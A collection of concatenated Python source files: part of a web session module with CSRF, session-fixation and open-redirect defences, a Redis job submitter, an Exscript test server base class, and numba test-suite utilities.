except ValueError:
# we'll warn about this in a moment anyway
pass
token = context.get_form_string(self.csrf_token)
# we accept a token even if the session expired but this
# form is unlikely to do much with a new session. The
# point is we compare to the cookie received and not the
# actual session key as this may have changed
if not token or token != csrf_match:
logger.warning(
"%s\nSecurity threat intercepted; "
"POST token mismatch, possible CSRF attack\n"
"cookie=%s; token=%s",
context.environ.get('PATH_INFO', ''),
csrf_match, token)
return self.error_page(context, 403)
return self.session_page(context, page_method, context.get_url())
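# Hedged illustration: a page protected by session_wrapper must echo the
# CSRF token back in any POST form.  The value compared above is the session
# id recovered from the signed session cookie, so a template would typically
# include something like:
#
#   <form method="POST" action="...">
#       <input type="hidden" name="csrftoken" value="{sid}"/>
#       ...
#   </form>
#
# where {sid} is context.session.sid and "csrftoken" is the configured
# csrf_token field name.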
def set_session(self, context):
"""Sets the session object in the context
The session is read from the session cookie, established and
marked as being seen now. If no cookie is found a new session
is created. In both cases a cookie header is set to update the
cookie in the browser."""
context.session = None
cookies = context.get_cookies()
s_signed = cookies.get(self._session_cookie, b'').decode('ascii')
if s_signed and self._test_cookie in cookies:
try:
s_msg = self.app_cipher.check_signature(s_signed)
context.session = self.SessionClass(s_msg.decode('utf-8'))
if context.session.established:
if context.session.age() > self._session_timeout:
context.session = None
elif context.session.age() > 120:
# You have 2 minutes to establish a session
context.session = None
if context.session:
# successfully read a session from the cookie this
# session can now be established
if not context.session.established:
self.establish_session(context)
context.session.seen_now()
self.set_session_cookie(context)
except ValueError:
# start a new session
logger.warning(
"%s\nSecurity threat intercepted; "
"session tampering detected\n"
"cookie=%s",
context.environ.get('PATH_INFO', ''),
s_signed)
pass
if context.session is None:
context.session = self.SessionClass()
self.set_session_cookie(context)
def set_session_cookie(self, context):
"""Adds the session cookie to the response headers
The cookie is bound to the path returned by
:meth:`WSGIContext.get_app_root` and is marked as being
http_only and is marked secure if we have been accessed through
an https URL.
You won't normally have to call this method but you may want to
override it if your application wishes to override the cookie
settings."""
root = context.get_app_root()
msg = to_text(context.session).encode('utf-8')
context.session_cookie = cookie.Section4Cookie(
self._session_cookie,
self.app_cipher.ascii_sign(msg).encode('ascii'),
path=str(root.abs_path), http_only=True,
secure=root.scheme.lower() == 'https')
def clear_session_cookie(self, context):
"""Removes the session cookie"""
root = context.get_app_root()
context.session_cookie = cookie.Section4Cookie(
self._session_cookie,
b'', path=str(root.abs_path), http_only=True,
secure=root.scheme.lower() == 'https', max_age=0)
def set_test_cookie(self, context, value="0"):
"""Adds the test cookie"""
c = cookie.Section4Cookie(
self._test_cookie, value,
path=str(context.get_app_root().abs_path),
max_age=self.settings['SessionApp']['cookie_test_age'])
context.add_header('Set-Cookie', str(c))
def establish_session(self, context):
"""Mark the session as established
This will update the session ID, override this method to update
any data store accordingly if you are already associating
protected information with the session to prevent it becoming
orphaned."""
context.session.establish()
def merge_session(self, context, merge_session):
"""Merges a session into the session in the context
Override this method to update any data store. If you are
already associating protected information with merge_session you
need to transfer it to the context session.
The default implementation does nothing and merge_session is
simply discarded."""
pass
def session_page(self, context, page_method, return_path):
"""Returns a session protected page
context
The :class:`WSGIContext` object
page_method
A function or *bound* method that will handle the page.
Must have the signature::
page_method(context)
and return the generator for the page as per the WSGI
specification.
return_path
A :class:`pyslet.rfc2396.URI` instance pointing at the page
that will be returned by page_method, used if the session is
not yet established and a redirect to the cookie test page
needs to be initiated.
This method is only called *after* the session has been created,
in other words, context.session must be a valid session.
This method either calls the page_method (after ensuring that
the session is established) or initiates a redirection sequence
which culminates in a request to return_path."""
# has the user been here before?
cookies = context.get_cookies()
if self._test_cookie not in cookies:
# no they haven't, set a cookie and redirect
c = cookie.Section4Cookie(
self._test_cookie, "0",
path=str(context.get_app_root().abs_path),
max_age=self.settings['SessionApp']['cookie_test_age'])
context.add_header('Set-Cookie', str(c))
# include the User-Agent and return path in the signed message
# placed in the query to help prevent an open redirect
# (defence in depth - first line of defence)
return_path_str = str(return_path)
s = to_text(context.session)
msg = s + return_path_str + context.environ.get(
'HTTP_USER_AGENT', '')
sig = self.app_cipher.sign(msg.encode('utf-8'))
query = urlencode(
{'return': return_path_str, 's': s, 'sig': sig})
ctest = URI.from_octets('ctest?' + query).resolve(
context.get_app_root())
return self.redirect_page(context, ctest)
return page_method(context)
def ctest(self, context):
"""The cookie test handler
This page takes three query parameters:
return
The return URL the user originally requested
s
The session that should be received in a cookie
sig
The session signature, which includes the User-Agent at
the end of the signed message.
framed (optional)
An optional parameter, if present and equal to '1' it means
we've already attempted to load the page in a new window so
if we still can't read cookies we'll return the
:meth:`cfail_page`.
If cookies cannot be read back from the context this page will
call :meth:`ctest_page` to provide an opportunity to open
the application in a new window (or :meth:`cfail_page` if this
possibility has already been exhausted).
If cookies are successfully read, they are compared with the
expected values (from the query) and the user is returned to the
return URL with an automatic redirect. The return URL must be
within the same application (to prevent 'open redirect' issues)
and, to be extra safe, we change the user-visible session ID as
we've exposed the previous value in the URL which makes it more
liable to snooping."""
cookies = context.get_cookies()
logger.debug("cookies: %s", repr(cookies))
query = context.get_query()
logger.debug("query: %s", repr(query))
if 'return' not in query or 's' not in query or 'sig' not in query:
# missing required parameters
return self.error_page(context, 400)
qmsg = query['s']
qsig = query['sig']
return_path = query['return']
if self._test_cookie not in cookies:
# cookies are blocked
if query.get('framed', '0') == '1':
# we've been through the wlaunch sequence already
# just fail
return self.cfail_page(context)
wlaunch = URI.from_octets('wlaunch').resolve(
context.get_app_root())
return self.ctest_page(
context, str(wlaunch), return_path, qmsg, qsig)
ua = context.environ.get('HTTP_USER_AGENT', '')
try:
self.app_cipher.check_signature(
qsig, (qmsg + return_path + ua).encode('utf-8'))
qsession = self.SessionClass(qmsg)
if qsession.established:
raise ValueError
except ValueError:
logger.warning("%s\nSecurity threat intercepted in ctest; "
"query tampering detected\n"
"s=%s; sig=%s;\nUserAgent: %s",
context.environ.get('PATH_INFO', ''),
qmsg, qsig, ua)
self.clear_session_cookie(context)
return self.error_page(context, 400)
cmsg_signed = cookies.get(
self._session_cookie, b'MISSING').decode('ascii')
try:
cmsg = self.app_cipher.check_signature(cmsg_signed)
csession = self.SessionClass(cmsg.decode('utf-8'))
if csession.established:
raise ValueError
except ValueError:
logger.warning("%s\nSecurity threat intercepted in ctest; "
"cookie tampering detected\n"
"cookie=%s\nUserAgent: %s",
context.environ.get('PATH_INFO', ''),
cmsg, ua)
self.clear_session_cookie(context)
return self.error_page(context, 400)
if csession.sid != qsession.sid or csession.established:
# we got a cookie, but not the one we expected. Possible
# foul play so kill the session. Established sessions must
# never make it to this page as they've been exposed in the
# URL.
logger.warning("%s\nSecurity threat intercepted in ctest; "
"session mismatch, possible fixation attack\n"
"cookie=%s; query=%s",
context.environ.get('PATH_INFO', ''),
cmsg, qmsg)
self.clear_session_cookie(context)
return self.error_page(context, 400)
if not self.check_redirect(context, return_path):
self.clear_session_cookie(context)
return self.error_page(context, 400)
# we have matching session ids and the redirect checks out, we
# now load the session from the cookie for real. This repeats
# the validity check but also adds the session timeout checks.
# This will result in an established session or, if the test
# page sequence was too slow, a new session that will be
# established when the return_path calls set_session.
self.set_session(context)
return self.redirect_page(context, return_path)
def ctest_page(self, context, target_url, return_url, s, sig):
"""Returns the cookie test page
Called when cookies are blocked (perhaps in a frame).
context
The request context
target_url
A string containing the base link to the wlaunch page. This
page can be opened in a new window (which may get around the
cookie restrictions). You must pass the return_url, session
and signature values as the 'return', 's' and 'sig' query
parameters respectively.
return_url
A string containing the URL the user originally requested,
and the location they should be returned to when the session
is established.
s
The session
sig
The session signature
You may want to override this implementation to provide a more
sophisticated page. The default simply presents the target_url
with added "return", "s" and "sig" parameters as a simple
hypertext link that will open in a new window.
A more sophisticated application might render a button or a form
but bear in mind that browsers that cause this page to load are
likely to prevent automated ways of opening this link."""
query = urlencode({'return': return_url, 's': s, 'sig': sig})
target_url = str(target_url) + '?' + query
data = """<html>
<head><title>Cookie Test Page</title></head>
<body>
<p>Cookie test failed: try opening in a <a href=%s
target="_blank" id="wlaunch">new window</a></p></body>
</html>""" % xml.escape_char_data7(str(target_url), True)
context.set_status(200)
return self.html_response(context, data)
def wlaunch(self, context):
"""Handles redirection to a new window
The query parameters must contain:
return
The return URL the user originally requested
s
The session that should also be received in a cookie
sig
The signature of the session, return URL and User-Agent
This page initiates the redirect sequence again, but this time
setting the framed query parameter to prevent infinite
redirection loops."""
cookies = context.get_cookies()
logger.debug("cookies: %s", repr(cookies))
query = context.get_query()
if 'return' not in query or 's' not in query or 'sig' not in query:
# missing required parameters
return self.error_page(context, 400)
logger.debug("query: %s", repr(query))
qmsg = query['s']
qsig = query['sig']
return_path = query['return']
ua = context.environ.get('HTTP_USER_AGENT', '')
# load the session from the query initially
try:
self.app_cipher.check_signature(
qsig, (qmsg + return_path + ua).encode('utf-8'))
qsession = self.SessionClass(qmsg)
if qsession.established:
raise ValueError
except ValueError:
logger.warning("%s\nSecurity threat intercepted in wlaunch; "
"query tampering detected\n"
"s=%s; sig=%s;\nUserAgent: %s",
context.environ.get('PATH_INFO', ''),
qmsg, qsig, ua)
self.clear_session_cookie(context)
return self.error_page(context, 400)
if not self.check_redirect(context, return_path):
return self.error_page(context, 400)
if self._test_cookie not in cookies:
# no cookies, either the user has never been here before or
# cookies are blocked completely, reuse the unestablished
# session from the query and go back to the test page
context.session = qsession
self.set_session_cookie(context)
self.set_test_cookie(context)
query = urlencode(
{'return': return_path, 's': qmsg, 'sig': qsig,
'framed': '1'})
ctest = URI.from_octets('ctest?' + query).resolve(
context.get_app_root())
return self.redirect_page(context, ctest)
# so cookies were blocked in the frame but now we're in a new
# window, suddenly, they appear. Merge our new session into the
# old one if the old one was already established
self.set_session(context)
# merge qsession into the one found in the older cookie (no need
# to establish it)
self.merge_session(context, qsession)
return self.redirect_page(context, return_path)
def cfail_page(self, context):
"""Called when cookies are blocked completely.
The default simply returns a plain text message stating that
cookies are blocked. You may want to include a page here with
information about how to enable cookies, a link to the privacy
policy for your application to help people make an informed
decision to turn on cookies, etc."""
context.set_status(200)
data = b"Page load failed: blocked cookies"
context.add_header("Content-Type", "text/plain")
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def check_redirect(self, context, target_path):
"""Checks a target path for an open redirect
target_path
A string or :class:`~pyslet.rfc2396.URI` instance.
Returns True if the redirect is *safe*.
The test ensures that the canonical root of our application
matches the canonical root of the target. In other words, it
must have the same scheme and matching authority (host/port)."""
if target_path:
if not isinstance(target_path, URI):
target_path = URI.from_octets(target_path)
if (target_path.get_canonical_root() !=
context.get_app_root().get_canonical_root()):
# catch the open redirect here, nice try!
logger.warning("%s\nSecurity threat intercepted; "
"external redirect, possible phishing attack\n"
"requested redirect to %s",
str(context.get_url()), str(target_path))
return False
else:
return True
else:
return False
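# Hedged illustration of check_redirect (hostnames are made up; app and
# context stand for a running SessionApp instance and its request context,
# assuming the application is served from https://myapp.example.com):
#
#   app.check_redirect(context, "https://myapp.example.com/app/home")
#   # -> True: same canonical root as the application
#   app.check_redirect(context, "https://evil.example.net/phish")
#   # -> False: different canonical root; a warning is logged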
|
submit.py
|
from redis import Redis
from choreo.multirq import Queue
import time
import threading
import random
def main():
queue = Queue(connection=Redis())
result = queue.enqueue('tasks.sleepy', args=(random.randint(20, 20),), timeout=10)
tic = time.time()
while result.get_status() not in ('finished', 'failed'):
time.sleep(1)
toc = time.time()
duration = round(toc - tic, 2)
print(f'Waited {duration}s for result')
print(f'Got result: {result.return_value}')
for _ in range(1):
time.sleep(1)
threading.Thread(target=main).start()
|
server.py
|
#
# Copyright (C) 2010-2017 Samuel Abels
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Base class for all servers.
"""
from __future__ import print_function
from builtins import str
import select
import socket
from multiprocessing import Process, Pipe
class Server(Process):
"""
Base class of the Telnet and SSH servers. Servers are intended to be
used for tests and attempt to emulate a device using the behavior of
the associated :class:`Exscript.emulators.VirtualDevice`. Sample usage::
device = VirtualDevice('myhost')
daemon = Telnetd('localhost', 1234, device)
device.add_command('ls', 'ok', prompt = True)
device.add_command('exit', daemon.exit_command)
daemon.start() # Start the server.
daemon.exit() # Stop the server.
daemon.join() # Wait until it terminates.
"""
def __init__(self, host, port, device, encoding='utf8'):
"""
Constructor.
:type host: str
:param host: The address to which the daemon binds.
:type port: str
:param port: The TCP port on which to listen.
:type device: VirtualDevice
:param device: A virtual device instance.
:type encoding: str
:param encoding: The encoding of data between client and server.
"""
Process.__init__(self, target=self._run)
self.host = host
self.port = int(port)
self.timeout = .5
self.dbg = 0
self.running = False
self.buf = b''
self.socket = None
self.device = device
self.encoding = encoding
self.to_child, self.to_parent = Pipe()
self.processes = []
def _dbg(self, level, msg):
if self.dbg >= level:
print(self.host + ':' + str(self.port), '-', end=' ')
print(msg)
def _poll_child_process(self):
if not self.to_parent.poll():
return False
try:
msg = self.to_parent.recv()
except socket.error:
self.running = False
return False
if msg == 'shutdown':
self.running = False
return False
if not self.running:
return False
return True
def _handle_connection(self, conn):
raise NotImplementedError()
def _run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((self.host, self.port))
self.socket.listen(1)
self.running = True
while self.running:
self._poll_child_process()
r, w, x = select.select([self.socket], [], [], self.timeout)
if not r:
continue
conn, addr = self.socket.accept()
proc = Process(target=self._handle_connection, args=(conn,))
self.processes.append(proc)
proc.start()
for proc in self.processes:
proc.join()
self.processes = []
self.socket.close()
def exit(self):
"""
Stop the daemon without waiting for the thread to terminate.
"""
self.to_child.send('shutdown')
def exit_command(self, cmd):
"""
Like exit(), but may be used as a handler in add_command.
:type cmd: str
:param cmd: The command that causes the server to exit.
"""
self.exit()
return ''
|
support.py
|
"""
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import traceback
import multiprocessing as mp
from contextlib import contextmanager
import numpy as np
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
from numba.six import PY2
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(utils.text_type,), (bytes, np.bytes_)]
_approx_typesets = [(float,), (complex,), (np.inexact,)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that the two scalars have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float, that value is used as an absolute
tolerance; if it is set to the string "eps" then the machine precision
of type(first) is used instead. If the absolute difference between
first and second is below this tolerance the two numbers are
considered equal. (This is to handle small numbers, typically of
magnitude less than machine precision.)
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since NumPy 1.16, NaT == NaT is False, so a special comparison is needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
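# Worked example of the tolerance computed above: with prec='double' and
# ulps=1 the number of significant bits is 53, so
#
#     delta = 2 ** (ulps - bits - 1) * (abs(first) + abs(second))
#           = 2 ** -53 * (abs(first) + abs(second))
#
# and raising ulps to 2 doubles the permitted difference.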
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
if PY2:
@contextmanager
def subTest(self, *args, **kwargs):
"""A stub TestCase.subTest backport.
This implementation is a no-op.
"""
yield
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
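# Hedged usage sketch for the two context managers above (the config and
# environment variable names are illustrative):
#
#   with override_config('DEBUG', True):
#       ...  # numba.config.DEBUG is True here; the old value is restored on exit
#
#   with override_env_config('NUMBA_DEBUG', '1'):
#       ...  # os.environ['NUMBA_DEBUG'] is '1' and config has been reloaded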
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
elif sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will eventually be deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
